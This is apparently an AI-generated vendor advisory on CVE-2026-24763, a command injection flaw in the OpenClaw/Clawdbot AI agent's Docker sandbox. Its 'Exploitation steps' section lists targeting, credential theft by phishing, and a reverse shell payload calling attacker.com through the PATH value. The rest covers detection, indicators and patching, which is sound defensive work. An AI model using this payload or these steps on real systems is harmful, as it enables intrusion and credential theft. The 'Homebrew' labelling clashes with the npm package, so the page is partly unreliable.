CVE-2026-24763: 
Homebrew vulnerability analysis and mitigation

Overview

CVE-2026-24763 is an authenticated OS command injection vulnerability in OpenClaw (formerly Clawdbot), a self-hosted personal AI assistant. The flaw exists in the Docker sandbox execution mechanism due to unsafe handling of the PATH environment variable when constructing shell commands, allowing an authenticated user who can control environment variables to inject arbitrary commands within the container context. It affects the clawdbot npm package versions up to and including 2026.1.24, and was fixed in version 2026.1.29. The advisory was published on January 31, 2026, with CVE assignment on February 2, 2026. The CVSS v3.1 base score is 8.8 (High) (GitHub Advisory, OpenClaw Security Advisory).

Technical details

The root cause (CWE-78: Improper Neutralization of Special Elements used in an OS Command) lies in the buildDockerExecArgs function within src/agents/bash-tools.shared.ts. Before the fix, the user-supplied PATH environment variable was interpolated directly into the shell command string passed to docker exec sh -lc, producing a command like export PATH="<user-input>:$PATH"; <command>. An attacker could supply a value such as $(touch /tmp/pwned) or a command-substitution payload as the PATH value, which would be evaluated by the shell when the command string was executed inside the container. The fix passes the custom PATH via an intermediate environment variable (CLAWDBOT_PREPEND_PATH) using Docker's -e flag, then references it with ${CLAWDBOT_PREPEND_PATH} inside the shell command — preventing shell interpolation of attacker-controlled content. Exploitation requires the Docker sandbox mode to be enabled and the attacker to have authenticated access with the ability to supply environment variables (GitHub Advisory, Fix Commit).

Impact

Successful exploitation allows an authenticated attacker to execute arbitrary OS commands inside the Docker sandbox container, resulting in high confidentiality, integrity, and availability impact within the container scope. Consequences include execution of unintended commands, access to the container filesystem and environment variables (which may contain API keys or credentials), exposure of sensitive data, and potential for denial of service within the container. In misconfigured or privileged container environments, the risk of host escape or lateral movement is elevated (GitHub Advisory, OpenClaw Security Advisory).

Exploitability

As of the time of disclosure, there is no public proof-of-concept exploit and no confirmed evidence of in-the-wild exploitation (Feedly). The EPSS score is approximately 0.066%–0.102%, placing it in the lower percentiles for near-term exploitation likelihood. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the broader OpenClaw ecosystem has attracted significant attention from threat researchers, with reports of tens of thousands of exposed OpenClaw instances and APT group interest noted in threat intelligence feeds (SecurityScorecard, The Daily Tech Feed). The vulnerability is detectable by Qualys (QID 5007332) and Nessus (plugin 297816).

Exploitation steps

  1. Reconnaissance: Identify OpenClaw/Clawdbot instances running versions ≤ 2026.1.24 with Docker sandbox mode enabled. Use tools like Shodan or Censys to locate internet-exposed OpenClaw control panels.
  2. Authenticate: Obtain valid credentials for the target OpenClaw instance (e.g., via phishing, credential stuffing, or use of a low-privilege account).
  3. Craft malicious PATH value: Prepare a command injection payload to be supplied as the PATH environment variable, such as $(touch /tmp/pwned) or a reverse shell payload like $(bash -i >& /dev/tcp/attacker.com/4444 0>&1).
  4. Trigger Docker sandbox execution: Submit a request to OpenClaw that causes it to invoke buildDockerExecArgs with the attacker-controlled PATH value. In the vulnerable code, this results in a shell command string like: export PATH="$(bash -i >& /dev/tcp/attacker.com/4444 0>&1):$PATH"; <command> being passed to docker exec sh -lc.
  5. Achieve command execution: The shell evaluates the injected command substitution within the container context, executing the attacker's payload and potentially establishing a reverse shell or performing data exfiltration (GitHub Advisory, Fix Commit).

Indicators of compromise

  • Logs: OpenClaw/Clawdbot application logs showing docker exec invocations with unusual or shell-metacharacter-containing PATH values; unexpected shell errors or command-not-found messages from within the container.
  • Process: Unexpected child processes spawned inside the Docker sandbox container (e.g., bash, curl, wget, nc, python) that are not part of normal agent operation; reverse shell connections originating from the container process.
  • File System: Unexpected files created inside the container (e.g., /tmp/clawdbot-path-injection, web shells, or downloaded binaries); modifications to container environment files.
  • Network: Outbound connections from the Docker container to unknown external IP addresses or domains, particularly on non-standard ports; DNS lookups for attacker-controlled infrastructure from the container host.
  • Environment: Presence of the CLAWDBOT_PREPEND_PATH environment variable with suspicious values in container inspection output (on patched versions, this is expected; on unpatched versions, the raw PATH value in shell commands is the indicator) (Fix Commit, GitHub Advisory).

Mitigation and workarounds

The vulnerability is fixed in OpenClaw version 2026.1.29 (npm package clawdbot / openclaw). Users should update immediately by running npm install openclaw@2026.1.29 or the equivalent package manager command. The fix commit (771f23d) refactors buildDockerExecArgs to pass the user-supplied PATH via Docker's -e CLAWDBOT_PREPEND_PATH=<value> flag and references it as ${CLAWDBOT_PREPEND_PATH} inside the shell command, eliminating direct interpolation. As interim mitigations: restrict authenticated access to trusted users only, apply the principle of least privilege for user accounts, avoid running Docker containers in privileged mode, and monitor for suspicious environment variable modifications and unexpected command execution patterns within OpenClaw Docker containers (GitHub Advisory, OpenClaw Release v2026.1.29).

Community reactions

The vulnerability attracted substantial coverage given OpenClaw's large user base (reportedly 378k GitHub stars). Tenable published a blog post on mitigating vulnerabilities in agentic AI tools including OpenClaw/Clawdbot, framing it as part of a broader class of AI agent security risks (Tenable Blog). SecurityScorecard and SecurityBoulevard highlighted that the real risk from OpenClaw is exposed infrastructure rather than AI-specific threats, with reports of over 40,000 exposed instances (SecurityScorecard, SecurityBoulevard). Kaspersky, Adversa AI, Cato Networks, and F5 Labs also published analyses, and the CVE appeared in multiple weekly CVE chatter top-ten lists from SOS Intelligence. Reddit discussions noted over 135,000 exposed OpenClaw instances, and community sentiment reflected concern about the security posture of self-hosted AI agents broadly (Reddit).

Additional resources


Source: This report was generated using AI

Related Homebrew vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-103678HIGH8.1
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103680MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103679MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-100266MEDIUM6.5
  • NixOS logoNixOS
  • hub
NoYesSep 30, 2026
CVE-2026-100265MEDIUM6.5
  • NixOS logoNixOS
  • rider
NoYesSep 30, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management